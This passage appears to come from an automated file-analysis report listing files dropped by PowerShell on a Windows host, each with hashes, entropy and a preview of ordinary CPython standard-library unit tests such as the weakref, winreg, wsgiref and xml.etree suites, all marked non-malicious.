                                                                                                                                                                                                                      SSDEEP:1536:47XdIcLSjIoPR+5uF0D4qtFWY2ELZoiyeQBXS1XEbpLmpu+:47qjIoPR+5uF0D4qtFWY2EHyeQBXSybq
                                                                                                                                                                                                                      MD5:5885596A4B0C953427DA1FDCC2B24AF2
                                                                                                                                                                                                                      SHA1:B2B76E8E946A1E9D32F35FB1ED1495138FF49ECB
                                                                                                                                                                                                                      SHA-256:F4B775EA494F6709AD2EAA18209DB06F1B8705A899261DB18D44B7F62DC57126
                                                                                                                                                                                                                      SHA-512:8DCB311ED598A5CF8C2703697E1041B258829492D5696C5AA2E29CF082F1566C5FFE9B891F880237BD961B3549225B39174B99FC5F7BA59EA53E106085D9145E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from collections import namedtuple..import contextlib..import sys..from textwrap import dedent..import threading..import time..import unittest....from test.support import import_helper....from test.test__xxsubinterpreters import (.. interpreters,.. _run_output,.. clean_up_interpreters,..)......channels = import_helper.import_module('_xxinterpchannels')......##################################..# helpers....#@contextmanager..#def run_threaded(id, source, **shared):..# def run():..# run_interp(id, source, **shared)..# t = threading.Thread(target=run)..# t.start()..# yield..# t.join()......def run_interp(id, source, **shared):.. _run_interp(id, source, shared)......def _run_interp(id, source, shared, _mainns={}):.. source = dedent(source).. main = interpreters.get_main().. if main == id:.. if interpreters.get_current() != main:.. raise RuntimeError.. # XXX Run a func?.. exec(source, _mainns).. else:.. inte
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):29051
                                                                                                                                                                                                                      Entropy (8bit):4.319215824402533
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:s2qdWyKWXHzHUbtmLVWxS1Vvw+hjH04RIocXAxay7:s22BIeiS1Vvw+1H04RIRi
                                                                                                                                                                                                                      MD5:0A9DB4153D56BED47607BA488043BE13
                                                                                                                                                                                                                      SHA1:0816D5560F212B346CA9B779FE771223E0F9002F
                                                                                                                                                                                                                      SHA-256:1ED854C6B3D19D9149C9C3460929A6D6A160C162342316E127842A63433414CB
                                                                                                                                                                                                                      SHA-512:3DFDC24BC4E68DC00030B0A63C7A6031AAEDC991B7349E99717D0A7E0CD453B98285EF1A696B7829FA89DE448DCC4B3B28F30DA22D96DD47BD1250624F34AA8E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import contextlib..import itertools..import os..import pickle..import sys..from textwrap import dedent..import threading..import unittest....import _testcapi..from test import support..from test.support import import_helper..from test.support import script_helper......interpreters = import_helper.import_module('_xxsubinterpreters')......##################################..# helpers....def _captured_script(script):.. r, w = os.pipe().. indented = script.replace('\n', '\n ').. wrapped = dedent(f""".. import contextlib.. with open({w}, 'w', encoding="utf-8") as spipe:.. with contextlib.redirect_stdout(spipe):.. {indented}.. """).. return wrapped, open(r, encoding="utf-8")......def _run_output(interp, request, shared=None):.. script, rpipe = _captured_script(request).. with rpipe:.. interpreters.run_string(interp, script, shared).. return rpipe.read()......def _wait_for_interp_to_run(interp, timeo
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):56
                                                                                                                                                                                                                      Entropy (8bit):3.9789184179031825
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:JShh9QLM3z6RNCmMmS6n:CQLMSC96n
                                                                                                                                                                                                                      MD5:FB272CE702DD000A8F7545E5C273319D
                                                                                                                                                                                                                      SHA1:7038AD618ED563503D3EC9F51E346F3A0979A571
                                                                                                                                                                                                                      SHA-256:DA045DC297BD06CB381D4E3A035D3C0D2BFE77E900398DB25B42DA2B9F74D815
                                                                                                                                                                                                                      SHA-512:FC3DC3893C82292E3DEBA87F5D08EC8DDA2582578B84C0CEE82FE62243B831030A1D96B8FA7630FD5CFE38F6A3D17FA865BC7E4973F939252AE6D99ED135A15A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import unittest....unittest.main('test.test_warnings')..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):8025
                                                                                                                                                                                                                      Entropy (8bit):5.180445530698596
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:FWiM6xuvsvR62voJMpbJomvp4qWI90mvp4qWI9Jbv2p2gVmqeKtNVkkITuxpgMld:FZ5kJ6bbb22ctmTuxpNlhlxdIdsyy
                                                                                                                                                                                                                      MD5:1E6AEC6D6FBF05800D9404F7F4087B4A
                                                                                                                                                                                                                      SHA1:4FD1B72D0DA099AD8AD1C3EDF0B5FAD44468C71B
                                                                                                                                                                                                                      SHA-256:8857DF1C49EAAC6AE94A8A87339B82011B89D5A035EC792A696A6D5B5502C4D0
                                                                                                                                                                                                                      SHA-512:8205E99BB25E542D28D0069C7079E3F4DCDDB4F731A7CCD580CA9DB5621AB420BAA01C4FA3B78D29BDAC8C8E744AC016059BA6D43E87F42C516FB7AF6830A50F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import unittest..from test import audiotests..from test import support..import io..import struct..import sys..import wave......class WaveTest(audiotests.AudioWriteTests,.. audiotests.AudioTestsWithSourceFile):.. module = wave......class WavePCM8Test(WaveTest, unittest.TestCase):.. sndfilename = 'pluck-pcm8.wav'.. sndfilenframes = 3307.. nchannels = 2.. sampwidth = 1.. framerate = 11025.. nframes = 48.. comptype = 'NONE'.. compname = 'not compressed'.. frames = bytes.fromhex("""\.. 827F CB80 B184 0088 4B86 C883 3F81 837E 387A 3473 A96B 9A66 \.. 6D64 4662 8E60 6F60 D762 7B68 936F 5877 177B 757C 887B 5F7B \.. 917A BE7B 3C7C E67F 4F84 C389 418E D192 6E97 0296 FF94 0092 \.. C98E D28D 6F8F 4E8F 648C E38A 888A AB8B D18E 0B91 368E C48A \.. """)......class WavePCM16Test(WaveTest, unittest.TestCase):.. sndfilename = 'pluck-pcm16.wav'.. sndfilenframes = 3307.. nchannels = 2.. sampwidth = 2.. framerate = 11025..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):78348
                                                                                                                                                                                                                      Entropy (8bit):4.52548463452985
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:4dIcUc5nCOnwhX/k2rWcqKe3x7elxZPAHMDxJnDCc:4dIcNCOnjK24DCc
                                                                                                                                                                                                                      MD5:DB166367DF7FF363E55370A4AC89F375
                                                                                                                                                                                                                      SHA1:D86185ADFB1E641FBA46EF0157D96D22858FCBAF
                                                                                                                                                                                                                      SHA-256:3B4C5B27817BAB79AA0721D33F2F015026C47D57E5D3DE7016AD1247FB18382F
                                                                                                                                                                                                                      SHA-512:72041D7AED7A94F03F042CB09AD9D284A30303E481EA0B5180AC3CBFA28224080D7E4564F7A0D4E4B9EF5E9C0F88CA9C6C3102C1A021C6D9EA9F23585859EB39
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import gc..import sys..import doctest..import unittest..import collections..import weakref..import operator..import contextlib..import copy..import threading..import time..import random....from test import support..from test.support import script_helper, ALWAYS_EQ..from test.support import gc_collect..from test.support import threading_helper....# Used in ReferencesTestCase.test_ref_created_during_del() ...ref_from_del = None....# Used by FinalizeTestCase as a global that may be replaced by None..# when the interpreter shuts down..._global_var = 'foobar'....class C:.. def method(self):.. pass......class Callable:.. bar = None.... def __call__(self, x):.. self.bar = x......def create_function():.. def f(): pass.. return f....def create_bound_method():.. return C().method......class Object:.. def __init__(self, arg):.. self.arg = arg.. def __repr__(self):.. return "<Object %r>" % self.arg.. def __eq__(self, other):.. if isinst
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):17178
                                                                                                                                                                                                                      Entropy (8bit):4.336517330171709
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:0pHTmQToYVNbz/sp2CcEAZd8AHFasADK0EusAfv8fo7T1DsIXLUA:4iQT1Bsp+laVKfuJP1YW
                                                                                                                                                                                                                      MD5:F29ECF71F271FC0D5AD2E4DFE54EF603
                                                                                                                                                                                                                      SHA1:39788CD2838FF9F9E05502A7CAC109F6D0FE4246
                                                                                                                                                                                                                      SHA-256:DF8B99DFCB5989E2E4F7065F286291B0621117DBCCEB77F55D930C7EE8F73C5F
                                                                                                                                                                                                                      SHA-512:8F2035612062416A2AF701BFE598554D4B21CADD405B919D39C3125E51159F30704B1B5DC29D05AE08310D77BBC8C99C641538B9F9A54F2764C79613A963F1EE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import unittest..from weakref import WeakSet..import copy..import string..from collections import UserString as ustr..from collections.abc import Set, MutableSet..import gc..import contextlib..from test import support......class Foo:.. pass....class RefCycle:.. def __init__(self):.. self.cycle = self....class WeakSetSubclass(WeakSet):.. pass....class WeakSetWithSlots(WeakSet):.. __slots__ = ('x', 'y')......class TestWeakSet(unittest.TestCase):.... def setUp(self):.. # need to keep references to them.. self.items = [ustr(c) for c in ('a', 'b', 'c')].. self.items2 = [ustr(c) for c in ('x', 'y', 'z')].. self.ab_items = [ustr(c) for c in 'ab'].. self.abcde_items = [ustr(c) for c in 'abcde'].. self.def_items = [ustr(c) for c in 'def'].. self.ab_weakset = WeakSet(self.ab_items).. self.abcde_weakset = WeakSet(self.abcde_items).. self.def_weakset = WeakSet(self.def_items).. self.letters = [ustr(c) for c
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):11083
                                                                                                                                                                                                                      Entropy (8bit):4.545694463775872
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:kpWsV9ubilf1Bv2fzujVSXujVSvujO43u8xU4ndujVS1MNBMm7lywgvqGlwja25r:kpWe9ua1BvnXcQ0lDm+
                                                                                                                                                                                                                      MD5:30751668492903979439E34FDF49BA6C
                                                                                                                                                                                                                      SHA1:0755582C7D51C3F4665B1E2FC70EB7CAE1AD6BC1
                                                                                                                                                                                                                      SHA-256:6800EDE29E6720E63817075B686F4A7F8C82E6898D177784DF7496B6B11B7789
                                                                                                                                                                                                                      SHA-512:1F4F2C882E63894048849AD750274BFFEF48C8C9F430CDB8AA7024D88BA189DF8A2ECBA6E2F0DC427970803352070819FC61EB4C64466E21826474EEE35898DE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import webbrowser..import unittest..import os..import sys..import subprocess..from unittest import mock..from test import support..from test.support import import_helper..from test.support import os_helper....if not support.has_subprocess_support:.. raise unittest.SkipTest("test webserver requires subprocess")....URL = 'https://www.example.com'..CMD_NAME = 'test'......class PopenMock(mock.MagicMock):.... def poll(self):.. return 0.... def wait(self, seconds=None):.. return 0......class CommandTestMixin:.... def _test(self, meth, *, args=[URL], kw={}, options, arguments):.. """Given a web browser instance method name along with arguments and.. keywords for same (which defaults to the single argument URL), creates.. a browser instance from the class pointed to by self.browser, calls the.. indicated instance method with the indicated arguments, and compares.. the resulting options and arguments passed to Popen by the browser..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):7053
                                                                                                                                                                                                                      Entropy (8bit):4.654208074381173
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:5TwAwAzbKLQnXfTmE1mESPMPtUdM3TmQEA:5ThwIbKLQnbJsi
                                                                                                                                                                                                                      MD5:96D323498E99B0B4EDB67E158AD3FDFD
                                                                                                                                                                                                                      SHA1:C6AF68D4123BBC3BB2EC962C88E56EDF178A911F
                                                                                                                                                                                                                      SHA-256:C881E493E741B7EB17E354DEC14662F4E8AF0F7E67F95C7CF075B760AADA806E
                                                                                                                                                                                                                      SHA-512:82F1A6C78849BEDE4837276658EFA5D45A063AC829A48713F6D0040C47F6391DE7FF6939D73DA21AB9E29E370DCD9BB05D9998326BD44DD0E1EB1F489E290DCB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:'''Tests for WindowsConsoleIO..'''....import io..import os..import sys..import tempfile..import unittest..from test.support import os_helper, requires_resource....if sys.platform != 'win32':.. raise unittest.SkipTest("test only relevant on win32")....from _testconsole import write_input....ConIO = io._WindowsConsoleIO....class WindowsConsoleIOTests(unittest.TestCase):.. def test_abc(self):.. self.assertTrue(issubclass(ConIO, io.RawIOBase)).. self.assertFalse(issubclass(ConIO, io.BufferedIOBase)).. self.assertFalse(issubclass(ConIO, io.TextIOBase)).... def test_open_fd(self):.. self.assertRaisesRegex(ValueError,.. "negative file descriptor", ConIO, -1).... with tempfile.TemporaryFile() as tmpfile:.. fd = tmpfile.fileno().. # Windows 10: "Cannot open non-console file".. # Earlier: "Cannot open console output buffer for reading".. self.assertRaisesRegex(ValueError,.. "Cannot o
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):23543
                                                                                                                                                                                                                      Entropy (8bit):4.689021728367339
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:uMb0ObtjZjYY8M6FtJU2N0Y/bouSALihHeWpU:uMb0ObF666JU2N0wJLiHeWpU
                                                                                                                                                                                                                      MD5:928484B67EF84B9A813C65B0C92A92EB
                                                                                                                                                                                                                      SHA1:3F058313B7CD27217428FAC2526199396CD3AB70
                                                                                                                                                                                                                      SHA-256:C6426767DC9974722AB67715894CFB606DC6CBE30A0728804EC6803E962DFE2E
                                                                                                                                                                                                                      SHA-512:E294982C226CC9D07619A19801374464EA78D31A4A69616E2EF3A710ACF6A9DBE0A09C4F5B43BE73BD569139A1668F132204EBC50F4A5F3E002C5BB11A0EBE27
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Test the windows specific win32reg module...# Only win32reg functions not hit here: FlushKey, LoadKey and SaveKey....import gc..import os, sys, errno..import threading..import unittest..from platform import machine, win32_edition..from test.support import cpython_only, import_helper....# Do this first so test will be skipped if module doesn't exist..import_helper.import_module('winreg', required_on=['win'])..# Now import everything..from winreg import *....try:.. REMOTE_NAME = sys.argv[sys.argv.index("--remote")+1]..except (IndexError, ValueError):.. REMOTE_NAME = None....# tuple of (major, minor)..WIN_VER = sys.getwindowsversion()[:2]..# Some tests should only run on 64-bit architectures where WOW64 will be...WIN64_MACHINE = True if machine() == "AMD64" else False....# Starting with Windows 7 and Windows Server 2008 R2, WOW64 no longer uses..# registry reflection and formerly reflected keys are shared instead...# Windows 7 and Windows Server 2008 R2 are version 6.1. Due to thi
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):5616
                                                                                                                                                                                                                      Entropy (8bit):4.878060330809044
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:MrxWrhESVw90TBX4Y6qi0cPi7Tn404td474A4ea4h42ZBxjoxcJcsLgA:MrKhE79SBIY6qi0cPmT4XUUrW+gThK5A
                                                                                                                                                                                                                      MD5:BE5A335624145CAF1C5D53EB3007D37F
                                                                                                                                                                                                                      SHA1:8694B6539304A348B0BE5857894103E0993A0859
                                                                                                                                                                                                                      SHA-256:DA975FFA4A77466F2CA0EE25FCB5F67B4C77BECF33B2568C2017B9BB91ABCCDB
                                                                                                                                                                                                                      SHA-512:21134AF3B002F79DF606A67047EC8D85FEBBA44146D5317012F707D73607D15A525D5EED4D309AD78164DC93F747066114938FF30E3D1CB86B1F96FF79875477
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Ridiculously simple test of the winsound module for Windows.....import functools..import pathlib..import time..import unittest....from test import support..from test.support import import_helper......support.requires('audio')..winsound = import_helper.import_module('winsound')......# Unless we actually have an ear in the room, we have no idea whether a sound..# actually plays, and it's incredibly flaky trying to figure out if a sound..# even *should* play. Instead of guessing, just call the function and assume..# it either passed or raised the RuntimeError we expect in case of failure...def sound_func(func):.. @functools.wraps(func).. def wrapper(*args, **kwargs):.. try:.. ret = func(*args, **kwargs).. except RuntimeError as e:.. if support.verbose:.. print(func.__name__, 'failed:', e).. else:.. if support.verbose:.. print(func.__name__, 'returned').. return ret.. return wrapper..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):27395
                                                                                                                                                                                                                      Entropy (8bit):4.520604180301441
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:HMnfkpksUVycHjOmCYVnj3CUIoMRK4MTNFjjRT:HMnfkpksUVyYjOX6nJ4MTNFjjRT
                                                                                                                                                                                                                      MD5:C11E6EFCBB04BC1352EBA45E21D1F9E1
                                                                                                                                                                                                                      SHA1:506B82E3BFAEB335B570895D2D99D6EF8CCF8D0B
                                                                                                                                                                                                                      SHA-256:6A85E7F8A9361E6EEC92BEECA174E82F4785B0FE28CDC5D57202433FFAD08F15
                                                                                                                                                                                                                      SHA-512:FBAD95832306C4689D28E4266C466EA40CAECB0276F7B03EB86CAD9B4BA70B33ABBA3840430365ED251125B3B90B8374891E79E7D7A93C65D3054541858CF70D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""Unit tests for the with statement specified in PEP 343."""......__author__ = "Mike Bland"..__email__ = "mbland at acm dot org"....import sys..import unittest..from collections import deque..from contextlib import _GeneratorContextManager, contextmanager, nullcontext......class MockContextManager(_GeneratorContextManager):.. def __init__(self, *args):.. super().__init__(*args).. self.enter_called = False.. self.exit_called = False.. self.exit_args = None.... def __enter__(self):.. self.enter_called = True.. return _GeneratorContextManager.__enter__(self).... def __exit__(self, type, value, traceback):.. self.exit_called = True.. self.exit_args = (type, value, traceback).. return _GeneratorContextManager.__exit__(self, type,.. value, traceback)......def mock_contextmanager(func):.. def helper(*args, **kwds):.. return MockContextManager(func, args, kwds)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3035
                                                                                                                                                                                                                      Entropy (8bit):4.72619719073847
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:SjFE9rb6R3+yIWaU6uZai9d+CF+OUnh2pQNGehgTalgneSgzq9gTalgbnpwRgC:KFYrbO3ZfVMCFRUnh2pQB0KqmnpC
                                                                                                                                                                                                                      MD5:211D86CFB7B17764A0E890B90A905936
                                                                                                                                                                                                                      SHA1:CF287D7AD4CA8D02C5A44FB836DCC43B86562EE8
                                                                                                                                                                                                                      SHA-256:C30EE47A7735146FA7E43C9721333642AAE15D7E6368789D95F1FFA94CCF706A
                                                                                                                                                                                                                      SHA-512:4C77A26CAADDC4C41976C1DE196D4C59AFD9ACED33EAFA9E7C777B1B9D27E6179F822D173327FDC2C36C12F6BC11737DDC6C174BD67D5751B542B6B99F0D9094
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Test the internal _wmi module on Windows..# This is used by the platform module, and potentially others....import unittest..from test.support import import_helper, requires_resource......# Do this first so test will be skipped if module doesn't exist.._wmi = import_helper.import_module('_wmi', required_on=['win'])......class WmiTests(unittest.TestCase):.. def test_wmi_query_os_version(self):.. r = _wmi.exec_query("SELECT Version FROM Win32_OperatingSystem").split("\0").. self.assertEqual(1, len(r)).. k, eq, v = r[0].partition("=").. self.assertEqual("=", eq, r[0]).. self.assertEqual("Version", k, r[0]).. # Best we can check for the version is that it's digits, dot, digits, anything.. # Otherwise, we are likely checking the result of the query against itself.. self.assertRegex(v, r"\d+\.\d+.+$", r[0]).... def test_wmi_query_repeated(self):.. # Repeated queries should not break.. for _ in range(10):..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):30871
                                                                                                                                                                                                                      Entropy (8bit):4.817483847913663
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:8+gZEPTm0TpTKiTHTZlTjxKTlG9b1qyYmta5D9VaO/+kp:8+gZEbbVKOzZxjxKTlG9bfvaD9Vpp
                                                                                                                                                                                                                      MD5:92F4900C15584D55342EB53F37659DEE
                                                                                                                                                                                                                      SHA1:0D023672404F2F906B3102165C2CBCBDDBFB82A7
                                                                                                                                                                                                                      SHA-256:A67CD07D8EC9F89F12813A7355986531E39EDBAC44428F74BD61B1EF874BC818
                                                                                                                                                                                                                      SHA-512:0F03A61A43F62193B8BC85FFE39FA878E199FE9FADAEBFD6D48CB113E92EDA272CFE97ECD4E027D0C4C234AE04F96F2511DC52AB0F039F5728B590E5DC7EFB5A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from unittest import mock..from test import support..from test.support import socket_helper..from test.test_httpservers import NoLogRequestHandler..from unittest import TestCase..from wsgiref.util import setup_testing_defaults..from wsgiref.headers import Headers..from wsgiref.handlers import BaseHandler, BaseCGIHandler, SimpleHandler..from wsgiref import util..from wsgiref.validate import validator..from wsgiref.simple_server import WSGIServer, WSGIRequestHandler..from wsgiref.simple_server import make_server..from http.client import HTTPConnection..from io import StringIO, BytesIO, BufferedReader..from socketserver import BaseServer..from platform import python_implementation....import os..import re..import signal..import sys..import threading..import unittest......class MockServer(WSGIServer):.. """Non-socket HTTP server""".... def __init__(self, server_address, RequestHandlerClass):.. BaseServer.__init__(self, server_address, RequestHandlerClass).. self.server_b
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2386
                                                                                                                                                                                                                      Entropy (8bit):4.6806323676364325
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:FrJ2+gDGELfNVpMn3GYuUMxMokFaF/m/mcfSfv+uK4G4pe:FrRgKELlWzuUMxMo0aF/m/9SfvQcA
                                                                                                                                                                                                                      MD5:8ED788AA533AC06860AAA9C382D0E3AC
                                                                                                                                                                                                                      SHA1:7DFA5B42ECB0081840FA9383F956D57F201F547E
                                                                                                                                                                                                                      SHA-256:06E1B288C66A9BF6092E5C71C070054225FEA94C33800E0D16D180FA71D5675A
                                                                                                                                                                                                                      SHA-512:DCC6405A0465414CAA75A74FFCD0F07C642102A8F20634ABDA35987E15F1872AF4417F546C9FE30AC4424D1F2FEDA8D4BCFCF0B6E1B121BD13515104EFEB257C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import unittest..from test.support import warnings_helper....xdrlib = warnings_helper.import_deprecated("xdrlib")......class XDRTest(unittest.TestCase):.... def test_xdr(self):.. p = xdrlib.Packer().... s = b'hello world'.. a = [b'what', b'is', b'hapnin', b'doctor'].... p.pack_int(42).. p.pack_int(-17).. p.pack_uint(9).. p.pack_bool(True).. p.pack_bool(False).. p.pack_uhyper(45).. p.pack_float(1.9).. p.pack_double(1.9).. p.pack_string(s).. p.pack_list(range(5), p.pack_uint).. p.pack_array(a, p.pack_string).... # now verify.. data = p.get_buffer().. up = xdrlib.Unpacker(data).... self.assertEqual(up.get_position(), 0).... self.assertEqual(up.unpack_int(), 42).. self.assertEqual(up.unpack_int(), -17).. self.assertEqual(up.unpack_uint(), 9).. self.assertTrue(up.unpack_bool() is True).... # remember position.. pos = up.ge
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4420
                                                                                                                                                                                                                      Entropy (8bit):4.5446776947374525
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:XPZdFUNnCoa1pFUS8YWGCNpF5aQ/TMX8TMXPzQfrzJC9rHa1:XBdjobt/TMMTMLkgy
                                                                                                                                                                                                                      MD5:6C671CD87EAF95E54589F7D905F19226
                                                                                                                                                                                                                      SHA1:00EF6FDBA2ACD34A4123CFB311924A547A65E703
                                                                                                                                                                                                                      SHA-256:4F7ED42C2FE38B512450743A1FAAAA2BA3EA08A8A1E24BCD064A6CCE5D3CA550
                                                                                                                                                                                                                      SHA-512:50DE7E38BABA7C0B1E0B50E903AE790F2B6A343E6C21609FDC2A8E60B8E239A62B6406F4453543B1D08D0A1413CB88A6733E952A71E8D01FC019F44C22B970D7
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Tests for xml.dom.minicompat....import copy..import pickle..import unittest....import xml.dom..from xml.dom.minicompat import *......class EmptyNodeListTestCase(unittest.TestCase):.. """Tests for the EmptyNodeList class.""".... def test_emptynodelist_item(self):.. # Test item access on an EmptyNodeList... node_list = EmptyNodeList().... self.assertIsNone(node_list.item(0)).. self.assertIsNone(node_list.item(-1)) # invalid item.... with self.assertRaises(IndexError):.. node_list[0].. with self.assertRaises(IndexError):.. node_list[-1].... def test_emptynodelist_length(self):.. node_list = EmptyNodeList().. # Reading.. self.assertEqual(node_list.length, 0).. # Writing.. with self.assertRaises(xml.dom.NoModificationAllowedErr):.. node_list.length = 111.... def test_emptynodelist___add__(self):.. node_list = EmptyNodeList() + NodeList().. self.assertEqua
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):166369
                                                                                                                                                                                                                      Entropy (8bit):4.833972376048433
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:wLQDbReFhqVV0Z8oAC9pCJ8aa7rjruu/d5WvIWxNXOwDqA8+EdXZcdh3VlApDYOb:wLQDbyhqVV042GYdXZcdVSYOdRCqPexG
                                                                                                                                                                                                                      MD5:676FC845DA5192DCE25DCD1CC9928952
                                                                                                                                                                                                                      SHA1:A333248FEE50ED74F623B8A52032019C7148C97D
                                                                                                                                                                                                                      SHA-256:13D99C858FA67491B45B5C31FD9BA01137FEF3E7B3D8E217EB922F11438DE62B
                                                                                                                                                                                                                      SHA-512:BF944CB86ECCC86BF068DA0377A9B50A89CE32865048913C2A37F223D8F7EC65A1954AFB51E8D10C7E9E52D7D6904F5A11908F770A865251B34EC4B63083EBA6
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# IMPORTANT: the same tests are run from "test_xml_etree_c" in order..# to ensure consistency between the C implementation and the Python..# implementation...#..# For this purpose, the module-level "ET" symbol is temporarily..# monkey-patched when running the "test_xml_etree_c" test suite.....import copy..import functools..import html..import io..import itertools..import operator..import os..import pickle..import sys..import textwrap..import types..import unittest..import warnings..import weakref....from functools import partial..from itertools import product, islice..from test import support..from test.support import os_helper..from test.support import warnings_helper..from test.support import findfile, gc_collect, swap_attr, swap_item..from test.support.import_helper import import_fresh_module..from test.support.os_helper import TESTFN......# pyET is the pure-Python implementation...#..# ET is pyET in test_xml_etree and is the C accelerated version in..# test_xml_etree_c...pyET = Non
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):9839
                                                                                                                                                                                                                      Entropy (8bit):4.511578909784529
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:mFWrb2fbobgNIe7nO+WrUPAV3qsaefgyuzuyagzVgyd+gzdadsZcd6EvoiScxsl0:HD4AVKradsm1vucK3FVqTjTvTc6zU6Cy
                                                                                                                                                                                                                      MD5:6A58E0B92D1186EAEE61B65F27F8ECDC
